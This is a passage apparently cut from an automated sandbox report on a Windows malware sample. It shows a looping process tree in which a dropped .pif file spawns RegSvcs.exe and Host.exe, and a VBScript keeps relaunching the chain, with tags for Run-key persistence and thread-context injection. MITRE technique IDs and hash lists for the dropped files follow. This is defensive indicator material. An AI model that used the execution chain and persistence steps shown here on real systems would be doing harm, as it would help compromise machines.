PID:2232

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
31⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3092

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
32⤵
- Executes dropped EXE
- Checks computer location settings
PID:228

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
33⤵
- Executes dropped EXE
PID:240

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
32⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
33⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:908

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
34⤵
- Executes dropped EXE
- Checks computer location settings
PID:4672

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
35⤵
- Executes dropped EXE
PID:1864

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
34⤵
PID:2332

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
35⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4496

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
36⤵
- Executes dropped EXE
PID:4604

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
37⤵
- Executes dropped EXE
PID:3736

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
36⤵
- Checks computer location settings
PID:760

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
37⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3560

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
38⤵
- Executes dropped EXE
- Checks computer location settings
PID:2960

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
39⤵
- Executes dropped EXE
PID:668

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
38⤵
- Checks computer location settings
PID:1604

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
39⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2248

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
40⤵
- Executes dropped EXE
- Checks computer location settings
PID:4648

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
41⤵
- Executes dropped EXE
PID:2512

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
40⤵
PID:688

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
41⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2840

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
42⤵
- Executes dropped EXE
PID:2052

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
43⤵
- Executes dropped EXE
PID:396

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
42⤵
- Checks computer location settings
PID:1128

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
43⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4296

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
44⤵
- Executes dropped EXE
- Checks computer location settings
PID:1148

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
45⤵
- Executes dropped EXE
PID:3564

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
44⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
45⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1740

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
46⤵
- Checks computer location settings
PID:3580

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
47⤵
PID:260

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
46⤵
- Checks computer location settings
PID:3760

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
47⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1820

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
48⤵
PID:2916

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
49⤵
PID:3756

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
48⤵
- Checks computer location settings
PID:4976

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
49⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4484

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
50⤵
- Checks computer location settings
PID:4312

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
51⤵
PID:3972

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
50⤵
PID:3200

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
51⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2748

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
52⤵
- Checks computer location settings
PID:2000

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
53⤵
PID:5104

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
52⤵
- Checks computer location settings
PID:2392

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
53⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1692

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
54⤵
PID:1084

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
55⤵
PID:3328

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
54⤵
- Checks computer location settings
PID:3936

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
55⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4120

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
56⤵
- Checks computer location settings
PID:1604

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
57⤵
PID:2132

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
56⤵
- Checks computer location settings
PID:696

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
57⤵
PID:4940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Host.exe.log

Filesize
142B

MD5
8c0458bb9ea02d50565175e38d577e35

SHA1
f0b50702cd6470f3c17d637908f83212fdbdb2f2

SHA256
c578e86db701b9afa3626e804cf434f9d32272ff59fb32fa9a51835e5a148b53

SHA512
804a47494d9a462ffa6f39759480700ecbe5a7f3a15ec3a6330176ed9c04695d2684bf6bf85ab86286d52e7b727436d0bb2e8da96e20d47740b5ce3f856b5d0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\murcqfuubq.swk

Filesize
159.5MB

MD5
22d7f4d3b1978cb2578357748b304b1f

SHA1
ff421d4585f434ac10d8f580b30af4e3c24a5a47

SHA256
638acd438935e740a086738ea8758be983c2bd4cfeaedf761e39aec7ceabdfe1

SHA512
fab8b70160b06f2e6c102564b1a22801aa9053cdb8a4188e74b64104319e79d0bc735d0417b6c07c75e276d831fec1ceeffc7edddf005d0762eed5e525768215

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\mwghanevcv.cpl

Filesize
55KB

MD5
b7e12759d7875eb5a0b4f8098084e180

SHA1
057eb45ee662fcfa885538ea98f179516e2992b5

SHA256
942a4068b017964d5c48244ba37f2580e231c31f68cf0809ae8d36987f4a5592

SHA512
74fae86f94f7b74b2451e78e44154844b0362e7fe5e55827004adc22dc7d4e8e90b7e410fdafc3c179cf202c23c6ce6cc8b1e6bd719b2c913a02cb7e726551fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs

Filesize
130B

MD5
b97491a92619d2e72e66db172d996434

SHA1
5764121230da2bf1677564a3018ae0f112aa4adb

SHA256
335bdbb5c818c1d88ef152daa73a9fc8480cacafe5b41e23c1c4fa2038bf121f

SHA512
b28b13cf67d17b66b53250e86eec57f13bcd7eceddc702f4d402a35f735a2d9427db054667be39da8549e187c4bece62a2aceb23fe80007ba35b34394f9dbefb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\vaphlv.fwo

Filesize
321KB

MD5
e3e028ff79d82e2d2e178a19bc0321d3

SHA1
a32c1c22a60a04b170f296de36dd4207367a705d

SHA256
4ebe8964c0606c2e56df8706682558665bd45ee63b004299e880433c266c27b8

SHA512
88617fb7d1244896fde88b49bb8bc07be65dfc02fc696a30457c771338471e2539a4b99bc557a0c72f9dde1fcc7d2013f1116edd8e98a14dc2e50126d065c217

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif

Filesize
801KB

MD5
dae073ff3ec1441bd6dd60a1c84bca94

SHA1
ffe7f1c111bd4e52877b6fa7cf078b3c7487b95a

SHA256
3dc837914c42318fc2133b9d8455e14a86981b67898080791d1dcdc7b31b28d5

SHA512
104fd5255b5716887eb510469626c9b1613e8a66f24b32c22ff26c190243658bf1ac6699ac04b9a903f2cd192719eb84c0c34b2143ba4206bf1f0874dfd33466

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
